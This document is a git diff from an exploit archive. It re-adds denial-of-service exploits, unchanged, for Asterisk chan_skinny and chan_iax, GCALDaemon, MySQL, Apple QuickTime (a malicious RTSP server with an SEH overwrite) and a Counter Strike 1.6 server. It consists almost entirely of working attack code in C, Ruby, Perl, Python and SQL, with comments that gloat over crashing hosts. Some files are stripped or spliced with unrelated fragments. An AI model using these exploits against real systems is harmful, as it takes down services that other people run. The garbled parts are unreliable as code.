turns out someone made the bug public, how sad.. but eh there are more fish in sea ;) - well here is a exploit for everyone who didn't take a look at the code. - - - -- = fbff = -- - -*/ -#include -#include -#include -#include -#include -#include -#include -#include -#include - -#define SKINNY_TCP_PORT 2000 -#define CLEN 1024 -#define SKINNY_MAX_SIZE 1000 -#define REGISTER_MESSAGE 0x0001 -struct register_message { - char name[16]; - uint32_t userId; - uint32_t instance; - uint32_t ip; - uint32_t type; - uint32_t maxStreams; -}; -struct skinny_client { - int sd; - struct sockaddr_in saddr; - int active; - char rhost[CLEN]; - char username[CLEN]; - char password[CLEN]; - char packet[SKINNY_MAX_SIZE]; -}; -struct skinny_client_message { - int len; - int res; - int e; /* 12 bytes */ - char *data; -}; - -struct skinny_client *g_sc; -struct messages { - int e; - char *human; - int (* const message_handler)(struct skinny_client *sc, struct skinny_client_message *scm); -} message_list[] = { - {0x81,"Register Ack Message\n", NULL}, - {0x9b,"Capabilities Request Message\n",NULL}, - {0x9f,"Reset Message\n", NULL} -}; -int skinny_client_read(struct skinny_client *sc) -{ - int ret; - int elm; - int type; - int i; - char buf[SKINNY_MAX_SIZE]; - struct skinny_client_message scm; - memset(&scm,0x00,sizeof(struct skinny_client_message)); - memset(&buf,0x00,sizeof(buf)); - elm = (sizeof(message_list)/sizeof(struct messages)); - ret = read(sc->sd,&buf,sizeof(buf)); - if (ret == -1) { - printf("+++ GOOD NEWS THE REMOTE HOST IS DEAD! READ RETURNED -1 AND THE TCP CONNECTION HAS WENT BYEBYE\n"); - return -1; - } else if (ret < sizeof(struct skinny_client_message) - 4){ - printf("we got some data back from the server just to little of it!\n"); - } else { - printf("++++ THINGS BROKE BUT THE HOST MAY STILL BE UP. HOW SAD\n"); - } - - return 0; -} -int skinny_client_sendmessage(struct skinny_client *sc, struct skinny_client_message *scm) -{ - int res; - int len; - char *outbuf; - int test; - - len = 90; - scm->len = 3; - outbuf = malloc(len); - if (!outbuf) { - return -1; - } - memset(outbuf,0x41,len); - /* place the 12 bytes header into outbuf */ - memcpy(outbuf,scm,12); - /* place the data into outbuf */ - memcpy(outbuf+12,scm->data,len-12); - res = write(sc->sd,outbuf,len); - printf("++ Wrote %i bytes\n", res); - return 0; -} - -/* send out a client register message to the remote skinny node */ -int skinny_client_register(struct skinny_client *sc) -{ - struct skinny_client_message scm; - struct register_message *rm; - int len; - - rm = malloc(sizeof(struct register_message )) + 4; - - if (!rm) { - printf("we could not allocated space for the register message\n"); - return -1; - } - - len = sizeof(struct register_message); - scm.len = htonl(len); - scm.e = htonl(REGISTER_MESSAGE); - scm.data = (char *)rm; - strcpy(rm->name,"SEP0007EB463101\x00"); - rm->type = 30006; - skinny_client_sendmessage(sc,&scm); - skinny_client_read(sc); - return 0; -} - -int skinny_client_connect(struct skinny_client *sc) -{ - int ret; - sc->sd = socket(AF_INET,SOCK_STREAM,0); - if (sc->sd == -1) { - return -1; - } - sc->saddr.sin_family = AF_INET; - sc->saddr.sin_port = htons(SKINNY_TCP_PORT); - sc->saddr.sin_addr.s_addr = inet_addr(sc->rhost); - ret = connect(sc->sd, (struct sockaddr *)&sc->saddr,sizeof(struct sockaddr)); - if (ret != 0) { - printf("+++ UNABLE TO CONNECT TO REMOTE HOST 2000/TCP!\n"); - return -1; - } - printf("+++ CONNECTION OK\n"); - sc->active = 1; - return 0; -} - -int main(int argc, char **argv) -{ - int i; - struct skinny_client *sc; - pthread_attr_t attr; - sc = malloc(sizeof(struct skinny_client)); - memset(sc,0,sizeof(struct skinny_client)); - - for (i=0;irhost,argv[i+1]); - } - } - if (*sc->rhost == 0) { - printf("+++ You must run with the -h option\n"); - return 0; - } - skinny_client_connect(sc); - skinny_client_register(sc); - - return 0; -} - -// milw0rm.com [2007-07-18] +/* + * AstKilla2.c + * gcc -o astkilla2 astkilla2.c + * ./astkilla2 -h 216.246.**.*** + * In no event will the author of this source be liable for any loss or damage of a material or + * immaterial nature arising from access to, use or non-use of published information, or from misuse of the connection or technical faults. + + + chan_skinny runs on 2000/TCP if you find a host with this open there is a really decent chance it's a asterisk machine some admin + forgot to disable chan_skinny on (which is default).. this should be a to all of those who don't lock down what they dont need (what is this 1999 ?) + + this is really quite old but as it turns out someone made the bug public, how sad.. but eh there are more fish in sea ;) + well here is a exploit for everyone who didn't take a look at the code. + + + -- = fbff = -- + +*/ +#include +#include +#include +#include +#include +#include +#include +#include +#include + +#define SKINNY_TCP_PORT 2000 +#define CLEN 1024 +#define SKINNY_MAX_SIZE 1000 +#define REGISTER_MESSAGE 0x0001 +struct register_message { + char name[16]; + uint32_t userId; + uint32_t instance; + uint32_t ip; + uint32_t type; + uint32_t maxStreams; +}; +struct skinny_client { + int sd; + struct sockaddr_in saddr; + int active; + char rhost[CLEN]; + char username[CLEN]; + char password[CLEN]; + char packet[SKINNY_MAX_SIZE]; +}; +struct skinny_client_message { + int len; + int res; + int e; /* 12 bytes */ + char *data; +}; + +struct skinny_client *g_sc; +struct messages { + int e; + char *human; + int (* const message_handler)(struct skinny_client *sc, struct skinny_client_message *scm); +} message_list[] = { + {0x81,"Register Ack Message\n", NULL}, + {0x9b,"Capabilities Request Message\n",NULL}, + {0x9f,"Reset Message\n", NULL} +}; +int skinny_client_read(struct skinny_client *sc) +{ + int ret; + int elm; + int type; + int i; + char buf[SKINNY_MAX_SIZE]; + struct skinny_client_message scm; + memset(&scm,0x00,sizeof(struct skinny_client_message)); + memset(&buf,0x00,sizeof(buf)); + elm = (sizeof(message_list)/sizeof(struct messages)); + ret = read(sc->sd,&buf,sizeof(buf)); + if (ret == -1) { + printf("+++ GOOD NEWS THE REMOTE HOST IS DEAD! READ RETURNED -1 AND THE TCP CONNECTION HAS WENT BYEBYE\n"); + return -1; + } else if (ret < sizeof(struct skinny_client_message) - 4){ + printf("we got some data back from the server just to little of it!\n"); + } else { + printf("++++ THINGS BROKE BUT THE HOST MAY STILL BE UP. HOW SAD\n"); + } + + return 0; +} +int skinny_client_sendmessage(struct skinny_client *sc, struct skinny_client_message *scm) +{ + int res; + int len; + char *outbuf; + int test; + + len = 90; + scm->len = 3; + outbuf = malloc(len); + if (!outbuf) { + return -1; + } + memset(outbuf,0x41,len); + /* place the 12 bytes header into outbuf */ + memcpy(outbuf,scm,12); + /* place the data into outbuf */ + memcpy(outbuf+12,scm->data,len-12); + res = write(sc->sd,outbuf,len); + printf("++ Wrote %i bytes\n", res); + return 0; +} + +/* send out a client register message to the remote skinny node */ +int skinny_client_register(struct skinny_client *sc) +{ + struct skinny_client_message scm; + struct register_message *rm; + int len; + + rm = malloc(sizeof(struct register_message )) + 4; + + if (!rm) { + printf("we could not allocated space for the register message\n"); + return -1; + } + + len = sizeof(struct register_message); + scm.len = htonl(len); + scm.e = htonl(REGISTER_MESSAGE); + scm.data = (char *)rm; + strcpy(rm->name,"SEP0007EB463101\x00"); + rm->type = 30006; + skinny_client_sendmessage(sc,&scm); + skinny_client_read(sc); + return 0; +} + +int skinny_client_connect(struct skinny_client *sc) +{ + int ret; + sc->sd = socket(AF_INET,SOCK_STREAM,0); + if (sc->sd == -1) { + return -1; + } + sc->saddr.sin_family = AF_INET; + sc->saddr.sin_port = htons(SKINNY_TCP_PORT); + sc->saddr.sin_addr.s_addr = inet_addr(sc->rhost); + ret = connect(sc->sd, (struct sockaddr *)&sc->saddr,sizeof(struct sockaddr)); + if (ret != 0) { + printf("+++ UNABLE TO CONNECT TO REMOTE HOST 2000/TCP!\n"); + return -1; + } + printf("+++ CONNECTION OK\n"); + sc->active = 1; + return 0; +} + +int main(int argc, char **argv) +{ + int i; + struct skinny_client *sc; + pthread_attr_t attr; + sc = malloc(sizeof(struct skinny_client)); + memset(sc,0,sizeof(struct skinny_client)); + + for (i=0;irhost,argv[i+1]); + } + } + if (*sc->rhost == 0) { + printf("+++ You must run with the -h option\n"); + return 0; + } + skinny_client_connect(sc); + skinny_client_register(sc); + + return 0; +} + +// milw0rm.com [2007-07-18] diff --git a/platforms/multiple/dos/4249.rb b/platforms/multiple/dos/4249.rb index a6bb788ab..a33f5b3ce 100755 --- a/platforms/multiple/dos/4249.rb +++ b/platforms/multiple/dos/4249.rb @@ -1,171 +1,171 @@ -#!/usr/bin/env ruby -# author = tenkei_ev -# Script to test chan_iax for the vuln in ASA-2007-015 -# Trigger subtypes of 11 or 12 will crash an unpatched server -# -# First establish a call - send new, recv accept, send ack, recv answer, send ack -# Then send IAX2 control packets with subtypes 0x0b or 0x0c that contain an information element -# If asterisk sends an ACK to the trigger, it didn't crash -# If no ACK is read off the socket during the timeout, consider asterisk to be crashed -# -# If any of the expected responses aren't received, asterisk may not crash when sending the trigger -# -# Updated: fix bug in crash detection with patched servers - -require 'socket' -require 'timeout' - -hostname = nil -trigger_subtype = nil - -if(ARGV.length < 2 ) - $stderr.puts "#{$0} \r\n" - exit -1 -else - hostname = ARGV[0] - if(ARGV[1][0,2] == '0x' || ARGV[1][0,2] == '0X') - trigger_subtype = ARGV[1].hex - else - trigger_subtype = ARGV[1].to_i - end -end - -t = UDPSocket.new -t.connect(hostname,4569) - -puts "[*] Sending NEW #{hostname}" -iax2_new = - [ - # HEADER - 1 << 15 | 1, # full-frame bit and source call number - 0, # retransmit bit and destination call number - 0, # timestamp - 0, # outbound stream sequence number - 0, # inbound stream sequence number - need to reset to 0 - 0x06, # Frame type - IAX2 Control frame - 1, # IAX2 NEW, C bit unset - - # VERSION IE - 0x0b, - 0x02, - 0x02, - - # FORMAT IE - # trying to match asterisk - ymmv if your asterisk server rejects you, - # change this to match some codecs asterisk expects - 0x09, - 0x04, - 0xe703, - ].pack("nnNCCCC CCn CCN") - -t.write(iax2_new) - -iax2_accept,sender = t.recvfrom(1024) -resp = iax2_accept.unpack("nnNCCCCCCN") -srccall = resp[0] & 0x7fff -dstcall = resp[1] & 0x7fff -timestamp = resp[2] -oseq = resp[3] -iseq = resp[4] -frametype = resp[5] -subtype = resp[6] - -if(frametype == 6 && subtype == 7) - puts "[*] ACCEPT received from #{hostname}" -else - puts "[!] Unexpected frame type `#{frametype}`, frame subtype `#{subtype}`" -end - -puts "[*] Sending ACK" -iax2_ack = - [ - 1 << 15 | dstcall & 0x7fff, - 0 << 15 | srccall & 0x7fff, - timestamp.to_i + 1000, - iseq, - oseq, - 0x06, # IAX2 Control frame - 0 << 7 | 0x04 & 0x7f, # IAX2 ACK - ].pack("nnNCCCC") - -t.write(iax2_ack) - -iax2_answer,sender = t.recvfrom(1024) -resp = iax2_answer.unpack("nnNCCCCCCN") -srccall = resp[0] & 0x7fff -dstcall = resp[1] & 0x7fff -timestamp = resp[2] -oseq = resp[3] -iseq = resp[4] -frametype = resp[5] -subtype = resp[6] - -if(frametype == 4 && subtype == 4) - puts "[*] ANSWER received from #{hostname}" -else - puts "[!] Unexpected frame type `#{frametype}`, frame subtype `#{subtype}`" -end - -puts "[*] Sending ACK" -iax2_ack = - [ - 1 << 15 | dstcall & 0x7fff, - 0 << 15 | srccall & 0x7fff, - timestamp.to_i + 1000, - iseq, - oseq, - 0x06, # IAX2 Control frame - 0 << 7 | 0x04 & 0x7f, # IAX2 ACK, C bit unset - ].pack("nnNCCCC") - -t.write(iax2_ack) - -puts "[*] Sending trigger" -trigger = - [ - 1 << 15 | dstcall & 0x7fff, - 0 << 15 | srccall & 0x7fff, - timestamp.to_i + 1000, - iseq, - oseq, - 0x06, - trigger_subtype, - - # IE - 0x0b, - 0x02, - 0x02, - - ].pack("nnNCCCC CCn ") - -t.write(trigger) - -begin - - timeout_seconds = 2 - - Timeout::timeout(timeout_seconds) do |tlength| - while(trigger_ack = t.recvfrom(1024)) - resp = trigger_ack[0].unpack("nnNCCCCCCN") - srccall = resp[0] & 0x7fff - dstcall = resp[1] & 0x7fff - timestamp = resp[2] - oseq = resp[3] - iseq = resp[4] - frametype = resp[5] - subtype = resp[6] - if((frametype == 6 && subtype == 4) || (frametype == 6 && subtype == 12)) - puts "[!] Asterisk survived" - exit - end - end - end - -rescue Timeout::Error => e - puts "[!!!] Asterisk died" -rescue ::Exception => e -end - -t.close - -# milw0rm.com [2007-07-31] +#!/usr/bin/env ruby +# author = tenkei_ev +# Script to test chan_iax for the vuln in ASA-2007-015 +# Trigger subtypes of 11 or 12 will crash an unpatched server +# +# First establish a call - send new, recv accept, send ack, recv answer, send ack +# Then send IAX2 control packets with subtypes 0x0b or 0x0c that contain an information element +# If asterisk sends an ACK to the trigger, it didn't crash +# If no ACK is read off the socket during the timeout, consider asterisk to be crashed +# +# If any of the expected responses aren't received, asterisk may not crash when sending the trigger +# +# Updated: fix bug in crash detection with patched servers + +require 'socket' +require 'timeout' + +hostname = nil +trigger_subtype = nil + +if(ARGV.length < 2 ) + $stderr.puts "#{$0} \r\n" + exit -1 +else + hostname = ARGV[0] + if(ARGV[1][0,2] == '0x' || ARGV[1][0,2] == '0X') + trigger_subtype = ARGV[1].hex + else + trigger_subtype = ARGV[1].to_i + end +end + +t = UDPSocket.new +t.connect(hostname,4569) + +puts "[*] Sending NEW #{hostname}" +iax2_new = + [ + # HEADER + 1 << 15 | 1, # full-frame bit and source call number + 0, # retransmit bit and destination call number + 0, # timestamp + 0, # outbound stream sequence number + 0, # inbound stream sequence number - need to reset to 0 + 0x06, # Frame type - IAX2 Control frame + 1, # IAX2 NEW, C bit unset + + # VERSION IE + 0x0b, + 0x02, + 0x02, + + # FORMAT IE + # trying to match asterisk - ymmv if your asterisk server rejects you, + # change this to match some codecs asterisk expects + 0x09, + 0x04, + 0xe703, + ].pack("nnNCCCC CCn CCN") + +t.write(iax2_new) + +iax2_accept,sender = t.recvfrom(1024) +resp = iax2_accept.unpack("nnNCCCCCCN") +srccall = resp[0] & 0x7fff +dstcall = resp[1] & 0x7fff +timestamp = resp[2] +oseq = resp[3] +iseq = resp[4] +frametype = resp[5] +subtype = resp[6] + +if(frametype == 6 && subtype == 7) + puts "[*] ACCEPT received from #{hostname}" +else + puts "[!] Unexpected frame type `#{frametype}`, frame subtype `#{subtype}`" +end + +puts "[*] Sending ACK" +iax2_ack = + [ + 1 << 15 | dstcall & 0x7fff, + 0 << 15 | srccall & 0x7fff, + timestamp.to_i + 1000, + iseq, + oseq, + 0x06, # IAX2 Control frame + 0 << 7 | 0x04 & 0x7f, # IAX2 ACK + ].pack("nnNCCCC") + +t.write(iax2_ack) + +iax2_answer,sender = t.recvfrom(1024) +resp = iax2_answer.unpack("nnNCCCCCCN") +srccall = resp[0] & 0x7fff +dstcall = resp[1] & 0x7fff +timestamp = resp[2] +oseq = resp[3] +iseq = resp[4] +frametype = resp[5] +subtype = resp[6] + +if(frametype == 4 && subtype == 4) + puts "[*] ANSWER received from #{hostname}" +else + puts "[!] Unexpected frame type `#{frametype}`, frame subtype `#{subtype}`" +end + +puts "[*] Sending ACK" +iax2_ack = + [ + 1 << 15 | dstcall & 0x7fff, + 0 << 15 | srccall & 0x7fff, + timestamp.to_i + 1000, + iseq, + oseq, + 0x06, # IAX2 Control frame + 0 << 7 | 0x04 & 0x7f, # IAX2 ACK, C bit unset + ].pack("nnNCCCC") + +t.write(iax2_ack) + +puts "[*] Sending trigger" +trigger = + [ + 1 << 15 | dstcall & 0x7fff, + 0 << 15 | srccall & 0x7fff, + timestamp.to_i + 1000, + iseq, + oseq, + 0x06, + trigger_subtype, + + # IE + 0x0b, + 0x02, + 0x02, + + ].pack("nnNCCCC CCn ") + +t.write(trigger) + +begin + + timeout_seconds = 2 + + Timeout::timeout(timeout_seconds) do |tlength| + while(trigger_ack = t.recvfrom(1024)) + resp = trigger_ack[0].unpack("nnNCCCCCCN") + srccall = resp[0] & 0x7fff + dstcall = resp[1] & 0x7fff + timestamp = resp[2] + oseq = resp[3] + iseq = resp[4] + frametype = resp[5] + subtype = resp[6] + if((frametype == 6 && subtype == 4) || (frametype == 6 && subtype == 12)) + puts "[!] Asterisk survived" + exit + end + end + end + +rescue Timeout::Error => e + puts "[!!!] Asterisk died" +rescue ::Exception => e +end + +t.close + +# milw0rm.com [2007-07-31] diff --git a/platforms/multiple/dos/4260.php b/platforms/multiple/dos/4260.php index 4091a8e45..92ffae7b2 100755 --- a/platforms/multiple/dos/4260.php +++ b/platforms/multiple/dos/4260.php @@ -1,24 +1,24 @@ - 42424242 - -?> - -# milw0rm.com [2007-08-06] + 42424242 + +?> + +# milw0rm.com [2007-08-06] diff --git a/platforms/multiple/dos/4432.html b/platforms/multiple/dos/4432.html index 0ee7a9d4d..7be50d870 100755 --- a/platforms/multiple/dos/4432.html +++ b/platforms/multiple/dos/4432.html @@ -1,20 +1,20 @@ - - -
-Sun (jre1.6.0_X) isInstalled.dnsResolve function overflow PoC
-Bug founded and code released by Yag Kohha.
-Greetz to:
-Shinnai, Str0ke
- -
- - - - - -# milw0rm.com [2007-09-19] + + +
+Sun (jre1.6.0_X) isInstalled.dnsResolve function overflow PoC
+Bug founded and code released by Yag Kohha.
+Greetz to:
+Shinnai, Str0ke
+ +
+ + + + + +# milw0rm.com [2007-09-19] diff --git a/platforms/multiple/dos/4540.pl b/platforms/multiple/dos/4540.pl index 5567cb9b8..b6b7a63db 100755 --- a/platforms/multiple/dos/4540.pl +++ b/platforms/multiple/dos/4540.pl @@ -1,30 +1,30 @@ -#!/usr/bin/perl -# /* -# * GCALDaemon <= 1.0-beta13 Remote DoS -# * -# * Original Advisory: -# * http://www.securityfocus.com/bid/25704/info -# * http://www.ikkisoft.com/stuff/SN-2007-01.txt -# * -# * Luca "ikki" Carettoni -# * http://www.ikkisoft.com -# */ - -use strict; -use warnings; -use IO::Socket; - -my $host = shift || die "Usage: $0 host [port]\n"; -my $port = shift || 9090; -my $sock = new IO::Socket::INET(PeerAddr => $host, PeerPort => $port, -PeerProto => 'tcp') -or die "error: $!\n"; -print "GCALDaemom DoS Expoit\n"; -print "Just 4 seconds...\n"; -sleep 4; -$sock->send("GET / HTTP/1.1\r\n"); -$sock->send("Content-Length: 1000000000\r\n\r\n"); -$sock->close; -print "\n\nNo more sync!\n"; - -# milw0rm.com [2007-10-16] +#!/usr/bin/perl +# /* +# * GCALDaemon <= 1.0-beta13 Remote DoS +# * +# * Original Advisory: +# * http://www.securityfocus.com/bid/25704/info +# * http://www.ikkisoft.com/stuff/SN-2007-01.txt +# * +# * Luca "ikki" Carettoni +# * http://www.ikkisoft.com +# */ + +use strict; +use warnings; +use IO::Socket; + +my $host = shift || die "Usage: $0 host [port]\n"; +my $port = shift || 9090; +my $sock = new IO::Socket::INET(PeerAddr => $host, PeerPort => $port, +PeerProto => 'tcp') +or die "error: $!\n"; +print "GCALDaemom DoS Expoit\n"; +print "Just 4 seconds...\n"; +sleep 4; +$sock->send("GET / HTTP/1.1\r\n"); +$sock->send("Content-Length: 1000000000\r\n\r\n"); +$sock->close; +print "\n\nNo more sync!\n"; + +# milw0rm.com [2007-10-16] diff --git a/platforms/multiple/dos/4615.txt b/platforms/multiple/dos/4615.txt index b381516ac..7f868025d 100755 --- a/platforms/multiple/dos/4615.txt +++ b/platforms/multiple/dos/4615.txt @@ -1,30 +1,30 @@ -/* - * MySQL <=6.0 possibly affected - * Kristian Erik Hermansen - * Credit: Joe Gallo - * You must have ALTER permissions to exploit this bug! - * Scenario: You found SQL injection, but you want to punch backend server - * in the nuts just for fun. Start with the ALTER TABLE statement on - * a table and field you know to exist. The first two SQL statements are - * simply to demostrate reproducibility... - */ - - -mysql> CREATE TABLE `test` ( - `id` int(10) unsigned NOT NULL AUTO_INCREMENT PRIMARY KEY, - `foo` text NOT NULL -) ENGINE=InnoDB DEFAULT CHARSET=latin1; -Query OK, 0 rows affected - -mysql> SELECT * FROM test WHERE CONTAINS(foo, 'bar'); -Empty set - -mysql> ALTER TABLE test ADD INDEX (foo(100)); -Query OK, 0 rows affected -Records: 0 Duplicates: 0 Warnings: 0 - -mysql> SELECT * FROM test WHERE CONTAINS(foo, 'bar'); -ERROR 2013 : Lost connection to MySQL server during query - - -# milw0rm.com [2007-11-09] +/* + * MySQL <=6.0 possibly affected + * Kristian Erik Hermansen + * Credit: Joe Gallo + * You must have ALTER permissions to exploit this bug! + * Scenario: You found SQL injection, but you want to punch backend server + * in the nuts just for fun. Start with the ALTER TABLE statement on + * a table and field you know to exist. The first two SQL statements are + * simply to demostrate reproducibility... + */ + + +mysql> CREATE TABLE `test` ( + `id` int(10) unsigned NOT NULL AUTO_INCREMENT PRIMARY KEY, + `foo` text NOT NULL +) ENGINE=InnoDB DEFAULT CHARSET=latin1; +Query OK, 0 rows affected + +mysql> SELECT * FROM test WHERE CONTAINS(foo, 'bar'); +Empty set + +mysql> ALTER TABLE test ADD INDEX (foo(100)); +Query OK, 0 rows affected +Records: 0 Duplicates: 0 Warnings: 0 + +mysql> SELECT * FROM test WHERE CONTAINS(foo, 'bar'); +ERROR 2013 : Lost connection to MySQL server during query + + +# milw0rm.com [2007-11-09] diff --git a/platforms/multiple/dos/4648.py b/platforms/multiple/dos/4648.py index ec98c94dd..cd5466e11 100755 --- a/platforms/multiple/dos/4648.py +++ b/platforms/multiple/dos/4648.py @@ -1,75 +1,75 @@ -#!/usr/bin/python -# Apple QuickTime 7.3 RTSP Response 0day Remote SEH Overwrite PoC Exploit -# Bug discovered by Krystian Kloskowski (h07) -# Tested on: Apple QuickTime Player 7.3 / XP SP2 Polish -# Details:.. -# -# (RTSP) Content-Type: [A * 995] + [B * 4096]\r\n -# -# 0x41414141 Pointer to next SEH record -# 0x42424242 SE handler -# -# ---------------------------------------------------------------- -# Exception C0000005 (ACCESS_VIOLATION reading [42424242]) -# ---------------------------------------------------------------- -# EAX=00000000: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ?? -# EBX=00000000: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ?? -# ECX=42424242: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ?? -# EDX=7C9037D8: 8B 4C 24 04 F7 41 04 06-00 00 00 B8 01 00 00 00 -# ESP=0012F8A8: BF 37 90 7C 90 F9 12 00-F8 F0 13 00 AC F9 12 00 -# EBP=0012F8C8: 78 F9 12 00 8B 37 90 7C-90 F9 12 00 F8 F0 13 00 -# ESI=00000000: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ?? -# EDI=00000000: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ?? -# EIP=42424242: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ?? -# --> N/A -# ---------------------------------------------------------------- -## - -from socket import * - -header = ( -'RTSP/1.0 200 OK\r\n' -'CSeq: 1\r\n' -'Date: 0x00 :P\r\n' -'Content-Base: rtsp://0.0.0.0/1.mp3/\r\n' -'Content-Type: %s\r\n' # <-- overflow -'Content-Length: %d\r\n' -'\r\n') - -body = ( -'v=0\r\n' -'o=- 16689332712 1 IN IP4 0.0.0.0\r\n' -'s=MPEG-1 or 2 Audio, streamed by the PoC Exploit o.O\r\n' -'i=1.mp3\r\n' -'t=0 0\r\n' -'a=tool:ciamciaramcia\r\n' -'a=type:broadcast\r\n' -'a=control:*\r\n' -'a=range:npt=0-213.077\r\n' -'a=x-qt-text-nam:MPEG-1 or 2 Audio, streamed by the PoC Exploit o.O\r\n' -'a=x-qt-text-inf:1.mp3\r\n' -'m=audio 0 RTP/AVP 14\r\n' -'c=IN IP4 0.0.0.0\r\n' -'a=control:track1\r\n' -) - -tmp = "A" * 995 -tmp += "B" * 4096 -header %= (tmp, len(body)) -evil = header + body - -s = socket(AF_INET, SOCK_STREAM) -s.bind(("0.0.0.0", 554)) -s.listen(1) -print "[+] Listening on [RTSP] 554" -c, addr = s.accept() -print "[+] Connection accepted from: %s" % (addr[0]) -c.recv(1024) -c.send(evil) -raw_input("[+] Done, press enter to quit") -c.close() -s.close() - -# EoF - -# milw0rm.com [2007-11-23] +#!/usr/bin/python +# Apple QuickTime 7.3 RTSP Response 0day Remote SEH Overwrite PoC Exploit +# Bug discovered by Krystian Kloskowski (h07) +# Tested on: Apple QuickTime Player 7.3 / XP SP2 Polish +# Details:.. +# +# (RTSP) Content-Type: [A * 995] + [B * 4096]\r\n +# +# 0x41414141 Pointer to next SEH record +# 0x42424242 SE handler +# +# ---------------------------------------------------------------- +# Exception C0000005 (ACCESS_VIOLATION reading [42424242]) +# ---------------------------------------------------------------- +# EAX=00000000: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ?? +# EBX=00000000: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ?? +# ECX=42424242: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ?? +# EDX=7C9037D8: 8B 4C 24 04 F7 41 04 06-00 00 00 B8 01 00 00 00 +# ESP=0012F8A8: BF 37 90 7C 90 F9 12 00-F8 F0 13 00 AC F9 12 00 +# EBP=0012F8C8: 78 F9 12 00 8B 37 90 7C-90 F9 12 00 F8 F0 13 00 +# ESI=00000000: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ?? +# EDI=00000000: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ?? +# EIP=42424242: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ?? +# --> N/A +# ---------------------------------------------------------------- +## + +from socket import * + +header = ( +'RTSP/1.0 200 OK\r\n' +'CSeq: 1\r\n' +'Date: 0x00 :P\r\n' +'Content-Base: rtsp://0.0.0.0/1.mp3/\r\n' +'Content-Type: %s\r\n' # <-- overflow +'Content-Length: %d\r\n' +'\r\n') + +body = ( +'v=0\r\n' +'o=- 16689332712 1 IN IP4 0.0.0.0\r\n' +'s=MPEG-1 or 2 Audio, streamed by the PoC Exploit o.O\r\n' +'i=1.mp3\r\n' +'t=0 0\r\n' +'a=tool:ciamciaramcia\r\n' +'a=type:broadcast\r\n' +'a=control:*\r\n' +'a=range:npt=0-213.077\r\n' +'a=x-qt-text-nam:MPEG-1 or 2 Audio, streamed by the PoC Exploit o.O\r\n' +'a=x-qt-text-inf:1.mp3\r\n' +'m=audio 0 RTP/AVP 14\r\n' +'c=IN IP4 0.0.0.0\r\n' +'a=control:track1\r\n' +) + +tmp = "A" * 995 +tmp += "B" * 4096 +header %= (tmp, len(body)) +evil = header + body + +s = socket(AF_INET, SOCK_STREAM) +s.bind(("0.0.0.0", 554)) +s.listen(1) +print "[+] Listening on [RTSP] 554" +c, addr = s.accept() +print "[+] Connection accepted from: %s" % (addr[0]) +c.recv(1024) +c.send(evil) +raw_input("[+] Done, press enter to quit") +c.close() +s.close() + +# EoF + +# milw0rm.com [2007-11-23] diff --git a/platforms/multiple/dos/4856.php b/platforms/multiple/dos/4856.php index a47bc0b04..7f5fedf88 100755 --- a/platforms/multiple/dos/4856.php +++ b/platforms/multiple/dos/4856.php @@ -1,187 +1,187 @@ -----[ Counter Strike 1.6 Denial Of Service POC ... ITDefence.ru Antichat.ru ] - - Counter Strike 1.6 Denial Of Service POC - Eugene Minaev underwater@itdefence.ru - Bug was found by Maxim Suhanov ( THE FUF ) - works only with no-steam servers - ___________________________________________________________________ - ____/ __ __ _______________________ _______ _______________ \ \ \ - / .\ / /_// // / \ \/ __ \ /__/ / - / / /_// /\ / / / / /___/ - \/ / / / / /\ / / / - / / \/ / / / / /__ //\ - \ / ____________/ / \/ __________// /__ // / - /\\ \_______/ \________________/____/ 2007 /_//_/ // //\ - \ \\ // // / - .\ \\ -[ ITDEFENCE.ru Security advisory ]- // // / . - . \_\\________[________________________________________]_________//_//_/ . . - - - - Counter Strike DOS POC (underwater@itdefence.ru) - - - - - - - -
-
- -
\n"' > kdie5.html +perl -e 'print "\n" . "\n"' > kdie6.html +perl -e 'print "\n" . "
- - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Host
Port
 Auth Type 2
Pass
 
-
- - -
ITDEFENCE / RUSSIA (http://itdefence.ru)
- - - - - -----[ FROM RUSSIA WITH LOVE :: underWHAT?! , gemaglabin ] - -# milw0rm.com [2008-01-06] +----[ Counter Strike 1.6 Denial Of Service POC ... ITDefence.ru Antichat.ru ] + + Counter Strike 1.6 Denial Of Service POC + Eugene Minaev underwater@itdefence.ru + Bug was found by Maxim Suhanov ( THE FUF ) + works only with no-steam servers + ___________________________________________________________________ + ____/ __ __ _______________________ _______ _______________ \ \ \ + / .\ / /_// // / \ \/ __ \ /__/ / + / / /_// /\ / / / / /___/ + \/ / / / / /\ / / / + / / \/ / / / / /__ //\ + \ / ____________/ / \/ __________// /__ // / + /\\ \_______/ \________________/____/ 2007 /_//_/ // //\ + \ \\ // // / + .\ \\ -[ ITDEFENCE.ru Security advisory ]- // // / . + . \_\\________[________________________________________]_________//_//_/ . . + + + + Counter Strike DOS POC (underwater@itdefence.ru) + + + + + + + +
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
Host
Port
 Auth Type 2
Pass
 
+
+
+
+
ITDEFENCE / RUSSIA (http://itdefence.ru)
